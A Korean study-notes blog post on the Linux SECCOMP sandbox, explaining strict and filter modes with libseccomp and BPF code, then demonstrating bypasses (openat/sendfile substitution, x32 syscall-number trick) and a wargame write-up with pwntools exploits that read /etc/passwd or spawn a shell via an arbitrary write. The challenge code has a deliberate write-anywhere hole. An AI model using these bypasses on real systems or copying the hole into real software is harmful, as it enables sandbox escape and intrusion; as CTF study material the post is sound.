TIL: SECCOMP

September 4, 2022

SECCOMP

Sandbox

Sandbox는 외부 공격으로부터 시스템을 보호하는 기법으로, application의 기능 수행을 위해 꼭 필요한 system call 실행만을 허용한다. SECCOMP는 이 sandbox 중 하나이다.

SECCOMP

SECCOMP(Secure computing mode)는 Linux kernel에서 sandbox 메커니즘을 제공하는 기능이다. 두 가지 모드 중 하나를 선택해 적용하여 특정 system call만을 사용하게 할 수 있다.

STRICT_MODE

STRICT_MODE에서는 read, write, exit, sigreturn system call만 호출할 수 있으며, 이외의 system call 요청이 들어오면 SIGKILL signal을 발생시켜 프로그램을 종료한다.

prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT);를 실행해 설정할 수 있다.

작동 원리

/*
 * System calls permitted in SECCOMP_MODE_STRICT (mode 1).
 * The list ends with -1 because __secure_computing_strict() stops scanning
 * only when it reads -1.
 */
static const int mode1_syscalls[] = {
    __NR_seccomp_read,
    __NR_seccomp_write,
    __NR_seccomp_exit,
    __NR_seccomp_sigreturn,
    -1, /* negative terminated */
};
#ifdef CONFIG_COMPAT
/*
 * 32-bit (compat) counterpart of mode1_syscalls.
 * It uses the same -1 terminator as the native table: the scan loop only
 * stops at -1, so a 0 terminator would let it read past the end of the array.
 */
static const int mode1_syscalls_32[] = {
    __NR_seccomp_read_32,
    __NR_seccomp_write_32,
    __NR_seccomp_exit_32,
    __NR_seccomp_sigreturn_32,
    -1, /* negative terminated */
};
#endif
static void __secure_computing_strict(int this_syscall) {
  const int *allowed_syscalls = mode1_syscalls;
#ifdef CONFIG_COMPAT
  if (in_compat_syscall()) allowed_syscalls = get_compat_mode1_syscalls();
#endif
  do {
    if (*allowed_syscalls == this_syscall) return;
  } while (*++allowed_syscalls != -1);
#ifdef SECCOMP_DEBUG
  dump_stack();
#endif
  seccomp_log(this_syscall, SIGKILL, SECCOMP_RET_KILL_THREAD, true);
  do_exit(SIGKILL);
}

STRICT_MODE를 처리하는 코드의 일부이다.

전달된 system call 번호(this_syscall)가 mode1_syscalls 또는 mode1_syscalls_32에 미리 정의된 번호와 일치하는지 검사한다.
일치하지 않는다면 SIGKILL를 전달하고 프로그램을 종료한다.

FILTER_MODE

FILTER_MODE에서는 원하는 system call의 호출을 허용하거나 거부할 수 있다. library 함수를 이용하거나 BPF(Berkeley Packet Filter) 문법을 통해 적용할 수 있다.

라이브러리 함수 사용

seccomp_init: SECCOMP 모드의 기본 값을 설정한다.
seccomp_rule_add: SECCOMP의 규칙을 추가한다.
seccomp_load: 앞서 적용한 규칙을 application에 반영한다.

ALLOW LIST

  /*
   * Install an allow-list seccomp filter.
   *
   * The default action is SCMP_ACT_KILL; only the system calls listed in
   * `allowed` are permitted. Any failure while building or loading the
   * filter prints "seccomp error" and terminates with a non-zero status,
   * so the program never continues without the sandbox it asked for.
   */
  void sandbox() {
    const int allowed[] = {
        SCMP_SYS(rt_sigreturn), SCMP_SYS(exit),  SCMP_SYS(exit_group),
        SCMP_SYS(read),         SCMP_SYS(write), SCMP_SYS(open),
        SCMP_SYS(openat),
    };
    scmp_filter_ctx ctx;

    ctx = seccomp_init(SCMP_ACT_KILL);
    if (ctx == NULL) {
      printf("seccomp error\n");
      exit(EXIT_FAILURE);
    }
    for (size_t i = 0; i < sizeof(allowed) / sizeof(allowed[0]); i++) {
      if (seccomp_rule_add(ctx, SCMP_ACT_ALLOW, allowed[i], 0) < 0) {
        printf("seccomp error\n");
        seccomp_release(ctx);
        exit(EXIT_FAILURE);
      }
    }
    /* Until this succeeds no filter is active, so failure must not be ignored. */
    if (seccomp_load(ctx) < 0) {
      printf("seccomp error\n");
      seccomp_release(ctx);
      exit(EXIT_FAILURE);
    }
    /*
     * NOTE(review): ctx is deliberately left allocated on success, as in the
     * original; freeing it under a kill-by-default filter could in principle
     * reach a system call outside the list. Confirm before adding a release.
     */
  }

SCMP_ACT_KILL을 기본 동작으로 지정해 모든 system call의 호출을 우선 금지한다.
이후 seccomp_rule_add를 이용해 사용을 허용할 system call만 허용하는 코드를 적고, seccomp_load로 규칙을 적용한다.

DENY LIST

  /*
   * Install a deny-list seccomp filter.
   *
   * The default action is SCMP_ACT_ALLOW; the system calls listed in
   * `denied` are answered with SCMP_ACT_KILL. Any failure while building or
   * loading the filter terminates with a non-zero status instead of running
   * on with a partial or missing filter.
   */
  void sandbox() {
    const int denied[] = {SCMP_SYS(open), SCMP_SYS(openat)};
    scmp_filter_ctx ctx;

    ctx = seccomp_init(SCMP_ACT_ALLOW);
    if (ctx == NULL) {
      exit(EXIT_FAILURE);
    }
    for (size_t i = 0; i < sizeof(denied) / sizeof(denied[0]); i++) {
      /* A rule that fails to register would silently leave the call allowed. */
      if (seccomp_rule_add(ctx, SCMP_ACT_KILL, denied[i], 0) < 0) {
        seccomp_release(ctx);
        exit(EXIT_FAILURE);
      }
    }
    if (seccomp_load(ctx) < 0) {
      seccomp_release(ctx);
      exit(EXIT_FAILURE);
    }
    /* Releasing frees the userspace context only; see seccomp_release(3). */
    seccomp_release(ctx);
  }

SCMP_ACT_ALLOW로 모든 system call을 허용한다.
seccomp_rule_add로 특정 system call의 호출을 금지한다.

BPF 사용

BPF는 kernel에서 지원하는 virtual machine으로, 임의 데이터를 비교하고 결과에 따라 특정 구문으로 분기하는 명령어를 제공한다.

예시 코드

/*
 * Expands to two filter entries: a compare of the loaded value against
 * __NR_<name>, followed by an entry that returns SECCOMP_RET_ALLOW.
 * With jump offsets 0 and 1, a match continues into the return entry and a
 * mismatch steps over it (classic BPF jt/jf convention).
 */
#define ALLOW_SYSCALL(name)                               \
  BPF_JUMP(BPF_JMP + BPF_JEQ + BPF_K, __NR_##name, 0, 1), \
      BPF_STMT(BPF_RET + BPF_K, SECCOMP_RET_ALLOW)
/* Filter entry that returns SECCOMP_RET_KILL. */
#define KILL_PROCESS BPF_STMT(BPF_RET + BPF_K, SECCOMP_RET_KILL)
/* Byte offsets of the nr and arch fields inside struct seccomp_data. */
#define syscall_nr (offsetof(struct seccomp_data, nr))
#define arch_nr (offsetof(struct seccomp_data, arch))
/* architecture x86_64 */
#define ARCH_NR AUDIT_ARCH_X86_64
/*
 * Install a hand-written BPF seccomp filter.
 *
 * The filter kills on an architecture other than ARCH_NR, then allows
 * rt_sigreturn, open, openat, read, write and exit_group and kills on
 * everything else.
 *
 * Returns 0 on success, or -1 after reporting the failing prctl() call
 * through perror().
 */
int sandbox() {
  struct sock_filter filter[] = {
      /* Validate architecture. */
      BPF_STMT(BPF_LD + BPF_W + BPF_ABS, arch_nr),
      /* On a match skip the kill entry below; otherwise fall into it. */
      BPF_JUMP(BPF_JMP + BPF_JEQ + BPF_K, ARCH_NR, 1, 0),
      BPF_STMT(BPF_RET + BPF_K, SECCOMP_RET_KILL),
      /* Get system call number. */
      BPF_STMT(BPF_LD + BPF_W + BPF_ABS, syscall_nr),
      /*
       * List allowed syscalls.
       * NOTE: nothing here compares the number against 0x40000000, so the
       * entries match only the exact __NR_* values.
       */
      ALLOW_SYSCALL(rt_sigreturn),
      ALLOW_SYSCALL(open),
      ALLOW_SYSCALL(openat),
      ALLOW_SYSCALL(read),
      ALLOW_SYSCALL(write),
      ALLOW_SYSCALL(exit_group),
      KILL_PROCESS,
  };
  struct sock_fprog prog = {
      .len = (unsigned short)(sizeof(filter) / sizeof(filter[0])),
      .filter = filter,
  };
  /*
   * perror() appends ": <error text>\n" itself, so the prefix must not end
   * with a newline or the message is split across two lines.
   */
  if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) == -1) {
    perror("prctl(PR_SET_NO_NEW_PRIVS)");
    return -1;
  }
  if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) == -1) {
    perror("Seccomp filter error");
    return -1;
  }
  return 0;
}

seccomp-tools

seccomp-tools는 복잡한 SECCOMP 규칙이 적용된 binary의 분석을 돕는 tool이다.

seccomp-tools dump ./bypass_seccomp 
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x08 0xc000003e  if (A != ARCH_X86_64) goto 0010
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x05 0xffffffff  if (A != 0xffffffff) goto 0010
 0005: 0x15 0x04 0x00 0x00000001  if (A == write) goto 0010
 0006: 0x15 0x03 0x00 0x00000002  if (A == open) goto 0010
 0007: 0x15 0x02 0x00 0x0000003b  if (A == execve) goto 0010
 0008: 0x15 0x01 0x00 0x00000142  if (A == execveat) goto 0010
 0009: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0010: 0x06 0x00 0x00 0x00000000  return KILL

위와 같이 binary에 적용된 SECCOMP 규칙을 살펴볼 수 있다.

Bypass SECCOMP - 같은 기능을 하는 system call 사용하기

#include <fcntl.h>
#include <seccomp.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <unistd.h>
/*
 * Switch stdin and stdout to unbuffered mode.
 * _IONBF is used instead of a literal mode number because the numeric value
 * of the buffering modes is defined by the C library, not by the standard.
 */
void init() {
  setvbuf(stdin, NULL, _IONBF, 0);
  setvbuf(stdout, NULL, _IONBF, 0);
}
/*
 * Deny-list filter of the bypass target: every system call is allowed by
 * default (SCMP_ACT_ALLOW) except open, execve, execveat and write, which
 * are answered with SCMP_ACT_KILL. Exits with status 0 if the filter
 * context cannot be created.
 * The results of seccomp_rule_add() and seccomp_load() are not checked.
 */
void sandbox() {
  scmp_filter_ctx ctx;
  ctx = seccomp_init(SCMP_ACT_ALLOW);
  if (ctx == NULL) {
    exit(0);
  }
  /* openat and sendfile are not on this list. */
  seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(open), 0);
  seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execve), 0);
  seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execveat), 0);
  seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(write), 0);
  seccomp_load(ctx);
}
/*
 * Read up to 0x1000 bytes of shellcode from stdin into a freshly mapped
 * read/write/execute page, install the seccomp filter, then jump to the
 * shellcode.
 *
 * Returns 1 if the page cannot be mapped or no input could be read;
 * otherwise returns 0 if the shellcode returns.
 */
int main(int argc, char *argv[]) {
  void *shellcode = mmap(0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC,
                         MAP_SHARED | MAP_ANONYMOUS, -1, 0);
  void (*sc)();

  /* mmap reports failure as MAP_FAILED, not NULL; writing to it would crash. */
  if (shellcode == MAP_FAILED) {
    perror("mmap");
    return 1;
  }
  init();
  memset(shellcode, 0, 0x1000);
  printf("shellcode: ");
  /* Without input the page holds only zero bytes; do not execute that. */
  if (read(0, shellcode, 0x1000) <= 0) {
    return 1;
  }
  /* The filter is installed only after all input has been read. */
  sandbox();
  sc = (void *)shellcode;
  sc();
  return 0;
}

위 코드는 rwx 권한이 있는 페이지를 할당하고, 입력받은 shellcode를 실행한다.

seccomp-tools 결과

seccomp-tools dump ./bypass_seccomp 
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x08 0xc000003e  if (A != ARCH_X86_64) goto 0010
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x05 0xffffffff  if (A != 0xffffffff) goto 0010
 0005: 0x15 0x04 0x00 0x00000001  if (A == write) goto 0010
 0006: 0x15 0x03 0x00 0x00000002  if (A == open) goto 0010
 0007: 0x15 0x02 0x00 0x0000003b  if (A == execve) goto 0010
 0008: 0x15 0x01 0x00 0x00000142  if (A == execveat) goto 0010
 0009: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0010: 0x06 0x00 0x00 0x00000000  return KILL

sandbox는 execve, execveat, write, open을 실행하지 못하게 한다.

같은 기능을 하는 system call 찾기

제한된 system call들과 같은 기능을 하는 다른 system call을 찾아본다.

open은 파일을 열기 위한 system call로, openat이라는 system call이 같은 역할을 수행할 수 있다.

int openat(int dirfd, const char *pathname, int flags, mode_t mode);

두 번째 인자인 pathname이 절대 경로일 경우 openat은 dirfd를 무시하므로, 이를 통해 원하는 파일의 내용을 읽을 수 있다.

write은 읽은 내용을 출력하기 위한 system call로, sendfile이 같은 역할을 수행할 수 있다.

ssize_t sendfile(int out_fd, int in_fd, off_t *offset, size_t count);

읽을 파일의 FD를 in_fd에 넣고, STDOUT을 out_fd에 넣으면 파일의 내용을 출력할 수 있다. count만큼 파일을 전송하므로 이 값을 읽고자 하는 파일의 크기보다 크게 설정해주어야 한다.

Exploit

따라서 위 두 시스템 콜을 사용한 exploit code는 아래와 같다.

# Exploit for ./bypass_seccomp: print a file using openat + sendfile, neither
# of which is on the target's deny list (open, write, execve, execveat).
from pwn import *
context.arch = 'x86_64'
p = process("./bypass_seccomp")
# The path is absolute, so the dirfd argument (0) is not used for the lookup.
shellcode = shellcraft.openat(0, "/etc/passwd")
# Put a non-zero value in r10 to serve as sendfile's count.
shellcode += 'mov r10, 0xffff'
# Send from the fd left in rax to fd 1. The generated "xor r10d, r10d" is
# stripped so that r10 keeps the value set above.
shellcode += shellcraft.sendfile(1, 'rax', 0).replace("xor r10d, r10d","")
shellcode += shellcraft.exit(0)
p.sendline(asm(shellcode))
p.interactive()

mov r10, 0xffff 구문을 통해 sendfile의 count를 큰 값으로 설정한다.
shellcraft.sendfile(1, 'rax', 0)을 통해 생성된 shellcode는 xor r10d, r10d를 포함하는데, 이 부분을 제외해주어야 count값이 0이 아닌 값으로 설정되므로 replace("xor r10d, r10d", "")를 통해 이 부분을 제거한다.

Bypass SECCOMP - system call 호출 방식 이용하기

ABI

ABI(Application Binary Interface)는 두 binary program module 사이의 interface를 말한다.

우리가 사용하는 x86, x86_64 외의 다양한 아키텍처들은 명령어 세트와 기능, 크기 등이 모두 다르다. 따라서 kernel code는 이 모든 것을 고려한 코드로 작성되어 있다. 64 bit OS에서 32 bit application을 호환하는 것이 예시가 될 수 있다. 서로 다른 아키텍처들을 호환하기 위한 코드를 이용해 SECCOMP를 우회할 수 있다.

system call 호출 방식

x86-64와 x32 두 ABI는 같은 processor에서 동작한다. 또한, x86-64에서는 32 bit 명령어를 호환할 수 있다. SECCOMP를 사용할 때 architecture를 AUDIT_ARCH_X86_64로 정의된 매크로로 명시하는데, 이는 linux kernel에서 x86-64와 x32를 동시에 일컫는 아키텍처 필드명이다. 그러나 두 ABI는 명백히 다르므로 linux kernel은 이를 구별하기 위해 system call 번호에 차이를 둔다. 코드를 통해 자세히 살펴보자.

do_syscall_64

  /*
   * Dispatch one system call.
   *
   * The number is first offered to do_syscall_x64() and, only if that
   * returns false, to do_syscall_x32(). If neither handles it and nr is not
   * -1, regs->ax receives the result of __x64_sys_ni_syscall().
   */
  __visible noinstr void do_syscall_64(struct pt_regs *regs, int nr)
  {
  	add_random_kstack_offset();
  	/* From here on nr is whatever the entry hook returned. */
  	nr = syscall_enter_from_user_mode(regs, nr);
  	instrumentation_begin();
  	if (!do_syscall_x64(regs, nr) && !do_syscall_x32(regs, nr) && nr != -1) {
  		/* Invalid system call, but still a system call. */
  		regs->ax = __x64_sys_ni_syscall(regs);
  	}
  	instrumentation_end();
  	syscall_exit_to_user_mode(regs);
  }

do_syscall_64는 linux kernel에서 system call을 호출하기 위해 사용하는 함수이다.
우선 do_syscall_x64를 호출해 x86-64의 system call을 호출하고, 이 함수가 실패하면 do_syscall_x32를 호출해 x32 ABI에서 system call을 한 번 더 호출한다.

do_syscall_x64

   /*
    * Run the handler at sys_call_table[nr] if nr, viewed as unsigned, is
    * below NR_syscalls, storing its result in regs->ax.
    *
    * Returns true when a handler was called, false when nr is out of range.
    */
   static __always_inline bool do_syscall_x64(struct pt_regs *regs, int nr)
  {
  	/*
  	 * Convert negative numbers to very high and thus out of range
  	 * numbers for comparisons.
  	 */
  	unsigned int unr = nr;
  	if (likely(unr < NR_syscalls)) {
  		/* Re-derive the index through array_index_nospec() before the table lookup. */
  		unr = array_index_nospec(unr, NR_syscalls);
  		regs->ax = sys_call_table[unr](regs);
  		return true;
  	}
  	return false;
  }

호출하는 system call 번호가 system call의 총 개수(NR_syscalls)보다 작은지 확인하고, 작다면 해당 system call을 호출한다.

do_syscall_x32

  /*
   * Run the handler at x32_sys_call_table[nr - __X32_SYSCALL_BIT] if
   * CONFIG_X86_X32_ABI is enabled and that index is below X32_NR_syscalls,
   * storing its result in regs->ax.
   *
   * Returns true when a handler was called, false otherwise.
   */
  static __always_inline bool do_syscall_x32(struct pt_regs *regs, int nr)
  {
  	/*
  	 * Adjust the starting offset of the table, and convert numbers
  	 * < __X32_SYSCALL_BIT to very high and thus out of range
  	 * numbers for comparisons.
  	 */
  	unsigned int xnr = nr - __X32_SYSCALL_BIT;
  	if (IS_ENABLED(CONFIG_X86_X32_ABI) && likely(xnr < X32_NR_syscalls)) {
  		/* Re-derive the index through array_index_nospec() before the table lookup. */
  		xnr = array_index_nospec(xnr, X32_NR_syscalls);
  		regs->ax = x32_sys_call_table[xnr](regs);
  		return true;
  	}
  	return false;
  }

호출하는 system call 번호에서 __X32_SYSCALL_BIT(0x40000000)을 뺀 값을 이용해 system call을 호출한다.

정리하자면, x32 ABI를 위한 system call을 호출할 때에는 기존 system call의 번호에 0x40000000을 더한 값을 사용한다.

따라서 원하는 system call이 SECCOMP에 의해 막혀있을 경우, do_syscall_x32에서 실행할 수 있으므로 해당 시스템 콜의 번호에 0x40000000을 더한 값을 번호로 넣어 system call을 실행한다.

라이브러리 함수를 사용할 때 vs BPF를 사용할 때

라이브러리 함수를 사용할 때

0002: 0x20 0x00 0x00 0x00000000  A = sys_number
0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005

seccomp-tools를 이용해 라이브러리 함수를 사용해 SECCOMP를 적용한 binary를 분석해보면, 코드에서는 정의하지 않은 비교문이 추가되어 있다.

system call 번호가 0x40000000이 넘지는 않는지 확인하는 구문이 추가되어 있으므로, 앞서 말한 방식으로 SECCOMP를 bypass할 수 없다.

BPF를 사용할 때

0003: 0x20 0x00 0x00 0x00000000  A = sys_number
0004: 0x15 0x00 0x01 0x0000000f  if (A != rt_sigreturn) goto 0006

반면 BPF를 사용했을 경우는 위와 같은 비교문이 없으므로 앞서 말한 방식의 exploit이 가능하다.

Exploit 예시

# Exploit for ./bypass_secbpf: issue open, read and write with 0x40000000
# OR-ed into the system call number, so the numbers no longer equal the
# values the BPF filter compares against.
from pwn import *

context.arch = 'x86_64'
p = process("./bypass_secbpf")

# Three system calls in sequence: open (2) on the string at `path`, read (0)
# of up to 0x1000 bytes from the returned fd onto the stack, and write (1)
# of that buffer to fd 1. rdx still holds 0x1000 for the write.
data = '''
mov rax, 2
or rax, 0x40000000
lea rdi, [rip+path]
xor rsi, rsi
syscall

mov rdi, rax
mov rsi, rsp
mov rdx, 0x1000
xor rax, rax
or rax, 0x40000000
syscall

mov rdi, 1
mov rsi, rsp
mov rax, 1
or rax, 0x40000000
syscall
path: .asciz "/etc/passwd"
'''
p.sendline(asm(data))
p.interactive()

open, read, write을 실행해 /etc/passwd를 읽는 exploit code이다.
or rax, 0x40000000을 이용해 system call 번호에 0x40000000을 더해준다. → x32 모드로 system call을 호출한다.

Wargame: SECCOMP

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <signal.h>
#include <stddef.h>
#include <sys/prctl.h>
#include <linux/seccomp.h>
#include <linux/filter.h>
#include <linux/unistd.h>
#include <linux/audit.h>
#include <sys/mman.h>

/* Seccomp mode that syscall_filter() passes to prctl(PR_SET_SECCOMP, ...); a writable global. */
int mode = SECCOMP_MODE_STRICT;

void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}

/*
 * Make stdin and stdout unbuffered, register alarm_handler for SIGALRM and
 * arm a 60-second alarm.
 */
void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    signal(SIGALRM, alarm_handler);
    alarm(60);
}

/*
 * Set PR_SET_NO_NEW_PRIVS, then call prctl(PR_SET_SECCOMP) with the current
 * value of the global `mode` and a small BPF program.
 *
 * Returns 0 on success, or -1 after perror() if either prctl() call fails.
 */
int syscall_filter() {
    /* Byte offsets of the nr and arch fields inside struct seccomp_data. */
    #define syscall_nr (offsetof(struct seccomp_data, nr))
    #define arch_nr (offsetof(struct seccomp_data, arch))

    /* architecture x86_64 */
    /* REG_SYSCALL is defined here but not referenced in the code shown. */
    #define REG_SYSCALL REG_RAX
    #define ARCH_NR AUDIT_ARCH_X86_64
    /*
     * NOTE(review): the program ends with a load and contains no allow/kill
     * return after it; presumably this does not matter because `mode` is not
     * SECCOMP_MODE_FILTER by default. Confirm.
     */
    struct sock_filter filter[] = {
        /* Validate architecture. */
        BPF_STMT(BPF_LD+BPF_W+BPF_ABS, arch_nr),
        BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, ARCH_NR, 1, 0),
        BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),
        /* Get system call number. */
        BPF_STMT(BPF_LD+BPF_W+BPF_ABS, syscall_nr),
        };

    struct sock_fprog prog = {
    .len = (unsigned short)(sizeof(filter)/sizeof(filter[0])),
    .filter = filter,
        };
    if ( prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) == -1 ) {
        perror("prctl(PR_SET_NO_NEW_PRIVS)\n");
        return -1;
        }

    /* The mode comes from the global, so its value at call time decides what is requested. */
    if ( prctl(PR_SET_SECCOMP, mode, &prog) == -1 ) {
        perror("Seccomp filter error\n");
        return -1;
        }
    return 0;
}

/*
 * Challenge menu loop.
 *
 *   1: call syscall_filter(), then read up to 1024 bytes of shellcode into
 *      the executable page; a second use of this option exits.
 *   2: jump to the shellcode page.
 *   3: read an address and then a value from stdin.
 *
 * Option 3 is the intended vulnerability: `addr` is passed to scanf by
 * value, so the parsed long is stored at the user-supplied address.
 */
int main(int argc, char* argv[])
{
    void (*sc)();
    unsigned char *shellcode;
    int cnt = 0;
    int idx;
    long addr;
    long value;

    initialize();

    /* Page that is readable, writable and executable at the same time. */
    shellcode = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

    while(1) {
        printf("1. Read shellcode\n");
        printf("2. Execute shellcode\n");
        printf("3. Write address\n");
        printf("> ");

        scanf("%d", &idx);

        switch(idx) {
            case 1:
                /* Only the first use is served. */
                if(cnt != 0) {
                    exit(0);
                }

                /* The return value is ignored, so a failed prctl() does not stop the program. */
                syscall_filter();
                printf("shellcode: ");
                read(0, shellcode, 1024);
                cnt++;
                break;
            case 2:
                sc = (void *)shellcode;
                sc();
                break;
            case 3:
                printf("addr: ");
                scanf("%ld", &addr);
                printf("value: ");
                /* addr itself (not &value) is the destination: arbitrary write. */
                scanf("%ld", addr);
                break;
            default:
                break;
        }
    }
    return 0;
}

Vulnerability Scanning

checksec
1번 메뉴로 원하는 shellcode를 입력한 뒤 2번 메뉴로 이를 실행할 수 있다.
3번 메뉴로 arbitrary address에 write이 가능하다.
mode 전역 변수가 SECCOMP_MODE_STRICT으로 설정되어 있고, prctl을 이 mode로 실행하므로 SECCOMP이 STRICT MODE로 실행되었음을 알 수 있다.

Exploit

PIE가 적용되어 있지 않으므로 mode의 주소가 일정하다. 따라서 3번 메뉴로 mode의 값을 0으로 overwrite하여 syscall_filter가 실행되었을 때 SECCOMP이 적용되지 않도록 하고, shellcode를 실행하면 된다.

# Exploit for the wargame binary: overwrite the global `mode` with 0 through
# menu 3, then load shellcode (menu 1) and run it (menu 2).
from pwn import *

#p = process("./seccomp")
p = remote("host3.dreamhack.games", 19791)
#context.terminal = ["tmux", "splitw", "-h"]
#gdb.attach(p)
context.arch = "amd64"

# Menu 3: write the value 0 to the address of `mode`.
p.sendlineafter("> ", "3")

p.sendlineafter("addr: ", str(0x602090)) # address of the global `mode`
p.sendlineafter("value: ", "0")

# Menu 1: syscall_filter() now runs with mode == 0; then send the shellcode.
p.sendlineafter("> ", "1")
sc = shellcraft.sh()
p.sendafter("shellcode: ", asm(sc))

# Menu 2: execute the shellcode.
p.sendlineafter("> ", "2")

p.interactive()

Share on

Twitter Facebook LinkedIn

Woohyuk Choi

TIL: SECCOMP

SECCOMP

Sandbox

SECCOMP

STRICT_MODE

작동 원리

FILTER_MODE

라이브러리 함수 사용

BPF 사용

seccomp-tools

Bypass SECCOMP - 같은 기능을 하는 system call 사용하기

seccomp-tools 결과

같은 기능을 하는 system call 찾기

Exploit

Bypass SECCOMP - system call 호출 방식 이용하기

ABI

system call 호출 방식

라이브러리 함수를 사용할 때 vs BPF를 사용할 때

Exploit 예시

Wargame: SECCOMP

Vulnerability Scanning

Exploit

Share on

Leave a comment